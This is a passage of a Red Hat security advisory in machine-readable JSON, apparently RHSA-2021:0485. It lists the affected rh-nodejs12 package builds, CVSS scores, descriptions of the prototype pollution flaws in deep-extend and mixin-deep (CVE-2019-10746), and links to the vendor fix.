"7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L", "version": "3.0" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-deep-extend: Prototype pollution can allow attackers to modify object properties" }, { "cve": "CVE-2019-10746", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2019-08-24T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1795475" } ], "notes": [ { "category": "description", "text": "A flaw was found in Nodejs\u0027s mixin-deep prior to versions 1.3.2 and 2.0.0. The mixin-deep function could be used to add or modify properties of the Object.prototype. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-mixin-deep: prototype pollution in function mixin-deep", "title": "Vulnerability summary" }, { "category": "other", "text": "In Red Hat Software Collections and Red Hat Enterprise Linux 8, nodejs-mixin-deep is bundled into nodejs-nodemon, and is not meant to be accessed outside of that package. Within nodemon, this flaw is rated with a Low severity.\n\nIn Red Hat OpenShift Logging the openshift-logging/kibana6-rhel8 container bundles many nodejs packages as a build time dependencies, including the mixin-deep package. \nThe vulnerable code is not used hence the impact to OpenShift Logging by this vulnerability is Low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2019-10746" }, { "category": "external", "summary": "RHBZ#1795475", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1795475" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2019-10746", "url": "https://www.cve.org/CVERecord?id=CVE-2019-10746" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-10746", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10746" } ], "release_date": "2019-06-19T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-11T13:37:42+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0485" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.0, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-devel-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-docs-0:12.20.1-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-1.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs12-npm-0:6.14.10-12.20.1.1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-0:12.20.1-1.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.20.1-1.el7.s390x", 